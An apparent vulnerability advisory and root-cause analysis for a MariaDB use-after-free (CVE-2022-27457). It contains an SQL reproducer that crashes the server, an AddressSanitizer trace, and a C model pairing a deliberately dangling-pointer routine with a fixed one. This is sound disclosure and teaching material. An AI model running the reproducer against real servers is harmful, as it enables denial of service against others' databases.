CVE-2022-27457: [MDEV-28098] incorrect key in "dup value" error after long unique

MariaDB Server 10.6.3 and below was discovered to contain a use-after-free in my_mb_wc_latin1 (strings/ctype-latin1.c). The AddressSanitizer report below shows how it is reached: a multi-table UPDATE hits a duplicate value on the long-unique TEXT column, prepare_record_for_error_message() re-reads the row through ha_rnd_pos(), and InnoDB frees the prebuilt blob heap that held the previously fetched TEXT value (row_mysql_prebuilt_free_blob_heap). print_keydup_error() then unpacks the key value for the "Duplicate entry" message from a pointer into that freed heap, and the latin1 conversion in err_conv() performs the stale read. Any authenticated user allowed to create tables and run UPDATE statements can trigger it with the statements below. In an ASan build the server aborts; in a regular build the stale read yields a wrong key value in the error message (the symptom named in the MDEV-28098 title) and, depending on what has reused the freed block, may crash the server, so the practical impact is a denial of service against the server process.


CREATE TABLE v0 ( v3 FLOAT PRIMARY KEY NULL , v2 TEXT UNIQUE NOT NULL , v1 INT UNIQUE ) ;
CREATE TABLE v4 ( v6 INT UNIQUE UNIQUE PRIMARY KEY UNIQUE , v5 TEXT , VALUE INT NOT NULL ) ;
INSERT INTO v0 VALUES ( -32768 , -128 , 58 ) , ( -1 , 44 , -128 ) ;
INSERT INTO v4 VALUES ( 50 , 61 , -1 ) , ( -2147483648 , -128 , 0 ) ;
UPDATE v0 AS v0 SET v2 = ( NOT ( ( v1 = 8 OR 'x' = -1 ) IS NULL ) ) , v3 = -128 ;
UPDATE v0 AS ONE NATURAL JOIN v4 SET v1 = v2 , v5 = 0 ;
UPDATE v4 NATURAL JOIN v0 VALUE SET v5 = v3 , v1 = 83 ;
UPDATE v0 SET v2 = 'x' * 'x' , v1 = -1 WHERE v3 IN ( 16 , 36 , NULL , 0 ) ;

=================================================================
==9471==ERROR: AddressSanitizer: heap-use-after-free on address 0x6290000c3288 at pc 0x000002b12085 bp 0x7fe334a243c0 sp 0x7fe334a243b8
READ of size 1 at 0x6290000c3288 thread T16
#0 0x2b12084 in my_mb_wc_latin1 /root/mariadb/strings/ctype-latin1.c:376:18
#1 0x2bd45cb in my_convert_using_func /root/mariadb/strings/ctype.c:1161:18
#2 0xb5b9b7 in err_conv(char*, unsigned int, char const*, unsigned int, charset_info_st const*) /root/mariadb/sql/sql_error.cc:931:10
#3 0x1a06285 in ErrBuff::set_str(char const*, unsigned long, charset_info_st const*) const /root/mariadb/sql/sql_error.h:852:10
#4 0x1a06285 in ErrConvString::lex_cstring() const /root/mariadb/sql/sql_error.h:890:12
#5 0x1a06285 in field_unpack(String*, Field*, unsigned char const*, unsigned int, bool) /root/mariadb/sql/key.cc:396:20
#6 0x1a06d36 in key_unpack(String*, TABLE*, st_key*) /root/mariadb/sql/key.cc:441:5
#7 0x15cfdc3 in print_keydup_error(TABLE*, st_key*, char const*, unsigned long) /root/mariadb/sql/handler.cc:4246:5
#8 0x15d2509 in print_keydup_error(TABLE*, st_key*, unsigned long) /root/mariadb/sql/handler.cc:4269:3
#9 0x15d2509 in handler::print_error(int, unsigned long) /root/mariadb/sql/handler.cc:4345:9
#10 0x100e249 in multi_update::send_data(List<Item>&) /root/mariadb/sql/sql_update.cc:2688:18
#11 0xdb5094 in select_result_sink::send_data_with_check(List<Item>&, st_select_lex_unit*, unsigned long long) /root/mariadb/sql/sql_class.h:5612:12
#12 0xdb5094 in end_send(JOIN*, st_join_table*, bool) /root/mariadb/sql/sql_select.cc:22331:9
#13 0xe315ff in evaluate_join_record(JOIN*, st_join_table*, int) /root/mariadb/sql/sql_select.cc:21325:11
#14 0xd4c13a in sub_select(JOIN*, st_join_table*, bool) /root/mariadb/sql/sql_select.cc:21095:9
#15 0xe315ff in evaluate_join_record(JOIN*, st_join_table*, int) /root/mariadb/sql/sql_select.cc:21325:11
#16 0xd4c13a in sub_select(JOIN*, st_join_table*, bool) /root/mariadb/sql/sql_select.cc:21095:9
#17 0xdc6797 in do_select(JOIN*, Procedure*) /root/mariadb/sql/sql_select.cc:20640:14
#18 0xdc6797 in JOIN::exec_inner() /root/mariadb/sql/sql_select.cc:4749:50
#19 0xdc344c in JOIN::exec() /root/mariadb/sql/sql_select.cc:4527:3
#20 0xd4e4e8 in mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_select_lex*) /root/mariadb/sql/sql_select.cc:5007:9
#21 0x1006042 in mysql_multi_update(THD*, TABLE_LIST*, List<Item>*, List<Item>*, Item*, unsigned long long, enum_duplicates, bool, st_select_lex_unit*, st_select_lex*, multi_update**) /root/mariadb/sql/sql_update.cc:1968:8
#22 0xc682e9 in mysql_execute_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:4486:12
#23 0xc4a67e in mysql_parse(THD*, char*, unsigned int, Parser_state*) /root/mariadb/sql/sql_parse.cc:8027:18
#24 0xc41ba9 in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool) /root/mariadb/sql/sql_parse.cc:1894:7
#25 0xc4b74b in do_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:1402:17
#26 0x111f9f2 in do_handle_one_connection(CONNECT*, bool) /root/mariadb/sql/sql_connect.cc:1418:11
#27 0x111f248 in handle_one_connection /root/mariadb/sql/sql_connect.cc:1312:5
#28 0x1f3f9dd in pfs_spawn_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
#29 0x7fe35a9ff608 in start_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread_create.c:477:8
#30 0x7fe35a715162 in clone /build/glibc-sMfBJT/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95

0x6290000c3288 is located 136 bytes inside of 16512-byte region [0x6290000c3200,0x6290000c7280)
freed by thread T16 here:
#0 0x80f732 in free (/usr/local/mysql/bin/mariadbd+0x80f732)
#1 0x243e1b8 in mem_heap_free(mem_block_info_t*) /root/mariadb/storage/innobase/include/mem0mem.inl:419:3
#2 0x243e1b8 in row_mysql_prebuilt_free_blob_heap(row_prebuilt_t*) /root/mariadb/storage/innobase/row/row0mysql.cc:101:2
#3 0x24b554c in row_sel_store_mysql_rec(unsigned char*, row_prebuilt_t*, unsigned char const*, dtuple_t const*, bool, dict_index_t const*, unsigned short const*) /root/mariadb/storage/innobase/row/row0sel.cc:3109:3
#4 0x24afa37 in row_search_mvcc(unsigned char*, page_cur_mode_t, row_prebuilt_t*, unsigned long, unsigned long) /root/mariadb/storage/innobase/row/row0sel.cc:5656:9
#5 0x21739c3 in ha_innobase::index_read(unsigned char*, unsigned char const*, unsigned int, ha_rkey_function) /root/mariadb/storage/innobase/handler/ha_innodb.cc:8970:5
#6 0x15c539a in handler::ha_rnd_pos(unsigned char*, unsigned char*) /root/mariadb/sql/handler.cc:3425:3
#7 0x1002a33 in prepare_record_for_error_message(int, TABLE*) /root/mariadb/sql/sql_update.cc:304:23
#8 0x100e1fd in multi_update::send_data(List<Item>&) /root/mariadb/sql/sql_update.cc:2687:5
#9 0xdb5094 in select_result_sink::send_data_with_check(List<Item>&, st_select_lex_unit*, unsigned long long) /root/mariadb/sql/sql_class.h:5612:12
#10 0xdb5094 in end_send(JOIN*, st_join_table*, bool) /root/mariadb/sql/sql_select.cc:22331:9
#11 0xe315ff in evaluate_join_record(JOIN*, st_join_table*, int) /root/mariadb/sql/sql_select.cc:21325:11
#12 0xd4c13a in sub_select(JOIN*, st_join_table*, bool) /root/mariadb/sql/sql_select.cc:21095:9
#13 0xe315ff in evaluate_join_record(JOIN*, st_join_table*, int) /root/mariadb/sql/sql_select.cc:21325:11
#14 0xd4c13a in sub_select(JOIN*, st_join_table*, bool) /root/mariadb/sql/sql_select.cc:21095:9
#15 0xdc6797 in do_select(JOIN*, Procedure*) /root/mariadb/sql/sql_select.cc:20640:14
#16 0xdc6797 in JOIN::exec_inner() /root/mariadb/sql/sql_select.cc:4749:50
#17 0xdc344c in JOIN::exec() /root/mariadb/sql/sql_select.cc:4527:3
#18 0xd4e4e8 in mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_select_lex*) /root/mariadb/sql/sql_select.cc:5007:9
#19 0x1006042 in mysql_multi_update(THD*, TABLE_LIST*, List<Item>*, List<Item>*, Item*, unsigned long long, enum_duplicates, bool, st_select_lex_unit*, st_select_lex*, multi_update**) /root/mariadb/sql/sql_update.cc:1968:8
#20 0xc682e9 in mysql_execute_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:4486:12
#21 0xc4a67e in mysql_parse(THD*, char*, unsigned int, Parser_state*) /root/mariadb/sql/sql_parse.cc:8027:18
#22 0xc41ba9 in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool) /root/mariadb/sql/sql_parse.cc:1894:7
#23 0xc4b74b in do_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:1402:17
#24 0x111f9f2 in do_handle_one_connection(CONNECT*, bool) /root/mariadb/sql/sql_connect.cc:1418:11
#25 0x111f248 in handle_one_connection /root/mariadb/sql/sql_connect.cc:1312:5
#26 0x1f3f9dd in pfs_spawn_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
#27 0x7fe35a9ff608 in start_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread_create.c:477:8

previously allocated by thread T16 here:
#0 0x80f99d in malloc (/usr/local/mysql/bin/mariadbd+0x80f99d)
#1 0x215c51e in ut_allocator<unsigned char, true>::allocate(unsigned long, unsigned char const*, unsigned int, bool, bool) /root/mariadb/storage/innobase/include/ut0new.h:375:11
#2 0x2301754 in mem_heap_create_block_func(mem_block_info_t*, unsigned long, unsigned long) /root/mariadb/storage/innobase/mem/mem0mem.cc:277:37
#3 0x24be2fc in mem_heap_create_func(unsigned long, unsigned long) /root/mariadb/storage/innobase/include/mem0mem.inl:377:10
#4 0x24be2fc in row_sel_store_mysql_field(unsigned char*, row_prebuilt_t*, unsigned char const*, dict_index_t const*, unsigned short const*, unsigned long, mysql_row_templ_t const*) /root/mariadb/storage/innobase/row/row0sel.cc:3050:27
#5 0x24b4ea9 in row_sel_store_mysql_rec(unsigned char*, row_prebuilt_t*, unsigned char const*, dtuple_t const*, bool, dict_index_t const*, unsigned short const*) /root/mariadb/storage/innobase/row/row0sel.cc:3196:8
#6 0x24afa37 in row_search_mvcc(unsigned char*, page_cur_mode_t, row_prebuilt_t*, unsigned long, unsigned long) /root/mariadb/storage/innobase/row/row0sel.cc:5656:9
#7 0x21739c3 in ha_innobase::index_read(unsigned char*, unsigned char const*, unsigned int, ha_rkey_function) /root/mariadb/storage/innobase/handler/ha_innodb.cc:8970:5
#8 0x2174d99 in ha_innobase::index_first(unsigned char*) /root/mariadb/storage/innobase/handler/ha_innodb.cc:9339:14
#9 0x2174d99 in ha_innobase::rnd_next(unsigned char*) /root/mariadb/storage/innobase/handler/ha_innodb.cc:9432:11
#10 0x15c44c3 in handler::ha_rnd_next(unsigned char*) /root/mariadb/sql/handler.cc:3393:5
#11 0x930064 in rr_sequential(READ_RECORD*) /root/mariadb/sql/records.cc:519:35
#12 0xd4c04d in sub_select(JOIN*, st_join_table*, bool) /root/mariadb/sql/sql_select.cc:21092:12
#13 0xdc6797 in do_select(JOIN*, Procedure*) /root/mariadb/sql/sql_select.cc:20640:14
#14 0xdc6797 in JOIN::exec_inner() /root/mariadb/sql/sql_select.cc:4749:50
#15 0xdc344c in JOIN::exec() /root/mariadb/sql/sql_select.cc:4527:3
#16 0xd4e4e8 in mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_select_lex*) /root/mariadb/sql/sql_select.cc:5007:9
#17 0x1006042 in mysql_multi_update(THD*, TABLE_LIST*, List<Item>*, List<Item>*, Item*, unsigned long long, enum_duplicates, bool, st_select_lex_unit*, st_select_lex*, multi_update**) /root/mariadb/sql/sql_update.cc:1968:8
#18 0xc682e9 in mysql_execute_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:4486:12
#19 0xc4a67e in mysql_parse(THD*, char*, unsigned int, Parser_state*) /root/mariadb/sql/sql_parse.cc:8027:18
#20 0xc41ba9 in dispatch_command(enum_server_command, THD*, char*, unsigned int, bool) /root/mariadb/sql/sql_parse.cc:1894:7
#21 0xc4b74b in do_command(THD*, bool) /root/mariadb/sql/sql_parse.cc:1402:17
#22 0x111f9f2 in do_handle_one_connection(CONNECT*, bool) /root/mariadb/sql/sql_connect.cc:1418:11
#23 0x111f248 in handle_one_connection /root/mariadb/sql/sql_connect.cc:1312:5
#24 0x1f3f9dd in pfs_spawn_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
#25 0x7fe35a9ff608 in start_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread_create.c:477:8

Thread T16 created by T0 here:
#0 0x7f9cfc in pthread_create (/usr/local/mysql/bin/mariadbd+0x7f9cfc)
#1 0x1f3fd39 in my_thread_create(unsigned long*, pthread_attr_t const*, void* (*)(void*), void*) /root/mariadb/storage/perfschema/my_thread.h:52:10
#2 0x1f3fd39 in pfs_spawn_thread_v1 /root/mariadb/storage/perfschema/pfs.cc:2252:15
#3 0x85cef4 in inline_mysql_thread_create(unsigned int, unsigned long*, pthread_attr_t const*, void* (*)(void*), void*) /root/mariadb/include/mysql/psi/mysql_thread.h:1139:11
#4 0x85cef4 in create_thread_to_handle_connection(CONNECT*) /root/mariadb/sql/mysqld.cc:5975:19
#5 0x85e72a in create_new_thread(CONNECT*) /root/mariadb/sql/mysqld.cc:6034:3
#6 0x85e72a in handle_accepted_socket(st_mysql_socket, st_mysql_socket) /root/mariadb/sql/mysqld.cc:6096:5
#7 0x85a34c in handle_connections_sockets() /root/mariadb/sql/mysqld.cc:6220:9
#8 0x84e9ef in mysqld_main(int, char**) /root/mariadb/sql/mysqld.cc:5870:3
#9 0x7fe35a61a0b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-use-after-free /root/mariadb/strings/ctype-latin1.c:376:18 in my_mb_wc_latin1

Shadow bytes around the buggy address:
  0x0c5280010600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c5280010610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c5280010620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c5280010630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c5280010640: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c5280010650: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c5280010660: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c5280010670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c5280010680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c5280010690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c52800106a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc

==9471==ABORTING
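The three stacks above pin down the lifetime bug: the TEXT value for the duplicate key was fetched into InnoDB's per-row blob heap during the join (allocated in row_sel_store_mysql_field), prepare_record_for_error_message() re-read the row through ha_rnd_pos(), which freed that heap (row_mysql_prebuilt_free_blob_heap), and print_keydup_error() then unpacked the key from the stale pointer. The C program below is an added example, not MariaDB code and not the upstream fix. It models that ordering with a two-block blob-heap allocator that hands blocks out round-robin (so a re-fetch never gets back the block it just freed, much like ASan's quarantine) and poisons freed bytes with 0xFD, the value ASan shows for freed regions, so the stale read is deterministic rather than undefined behaviour on the real allocator. The vulnerable ordering sits beside a hardened one that copies the key bytes into caller-owned storage before anything that can free the heap; that mitigation, and the names fetch_row, format_keydup, report_dup_vulnerable, report_dup_fixed and key_intact, are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Toy blob heap (added example, not InnoDB's mem_heap): two fixed blocks handed out
 * round-robin, so a re-fetch never reuses the block it just freed. Freed blocks are
 * poisoned with 0xFD so that any read through a stale pointer is visible. */
enum { BLOB_LEN = 16, NBLOCKS = 2 };
struct blob_block { unsigned char bytes[BLOB_LEN]; };
static struct blob_block pool[NBLOCKS];
static int next_block;
static struct blob_block *cur_heap;   /* like prebuilt->blob_heap: the row's current heap */

static void blob_heap_free(struct blob_block *b) {
    memset(b->bytes, 0xFD, BLOB_LEN);            /* poison: mirrors ASan's 'fd' shadow */
}

static struct blob_block *blob_heap_create(void) {
    struct blob_block *b = &pool[next_block];
    next_block = (next_block + 1) % NBLOCKS;
    return b;
}

/* Analogue of row_sel_store_mysql_rec(): a fetch frees the previous blob heap, allocates
 * a fresh one and stores the TEXT column there. The returned field pointer is only valid
 * until the next fetch. */
static const unsigned char *fetch_row(const char *text_value) {
    if (cur_heap)
        blob_heap_free(cur_heap);
    cur_heap = blob_heap_create();
    size_t n = strlen(text_value);
    if (n > BLOB_LEN)
        n = BLOB_LEN;
    memset(cur_heap->bytes, 0, BLOB_LEN);
    memcpy(cur_heap->bytes, text_value, n);
    return cur_heap->bytes;
}

/* Analogue of key_unpack()/field_unpack(): render the key bytes into the error text. */
static void format_keydup(char *out, size_t outsz, const unsigned char *key, size_t len) {
    snprintf(out, outsz, "Duplicate entry '%.*s' for key 'v2'", (int)len, (const char *)key);
}

/* Vulnerable ordering, as in the trace: the key pointer comes from the row fetched during
 * the join, the row is re-read for the error message (freeing that heap), and only then
 * is the message formatted from the now-dangling pointer. */
static void report_dup_vulnerable(char *out, size_t outsz, const char *value) {
    const unsigned char *key_ptr = fetch_row(value);   /* rr_sequential -> rnd_next */
    size_t key_len = strlen(value);
    if (key_len > BLOB_LEN)
        key_len = BLOB_LEN;
    fetch_row(value);                  /* prepare_record_for_error_message -> ha_rnd_pos */
    format_keydup(out, outsz, key_ptr, key_len);       /* print_keydup_error: stale read */
}

/* Hardened ordering (this example's mitigation, not the upstream patch): copy the key
 * bytes into storage the caller owns before anything that can free or reuse the heap. */
static void report_dup_fixed(char *out, size_t outsz, const char *value) {
    unsigned char key_copy[BLOB_LEN];
    const unsigned char *key_ptr = fetch_row(value);
    size_t key_len = strlen(value);
    if (key_len > BLOB_LEN)
        key_len = BLOB_LEN;
    memcpy(key_copy, key_ptr, key_len);   /* lifetime now independent of the blob heap */
    fetch_row(value);
    format_keydup(out, outsz, key_copy, key_len);
}

/* 1 if the message still carries the quoted key value, 0 if it came from poisoned memory. */
static int key_intact(const char *msg, const char *value) {
    char quoted[BLOB_LEN + 3];
    snprintf(quoted, sizeof quoted, "'%s'", value);
    return strstr(msg, quoted) != NULL;
}

int main(void) {
    char msg[64];
    report_dup_vulnerable(msg, sizeof msg, "44");   /* v2 = 44, from the repro's INSERT */
    printf("vulnerable: key intact=%d\n", key_intact(msg, "44"));
    report_dup_fixed(msg, sizeof msg, "44");
    printf("fixed:      key intact=%d (%s)\n", key_intact(msg, "44"), msg);
    return 0;
}
```

The vulnerable path produces a message whose key bytes are 0xFD, which is the "incorrect key in dup value error" symptom from the MDEV-28098 title rendered in miniature; under the real allocator the same read is undefined behaviour and is what ASan flags. The general rule the hardened path follows is that anything kept across a storage-engine re-fetch (key images, field pointers, error-message operands) must be copied out, because the engine owns the buffers those pointers address.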
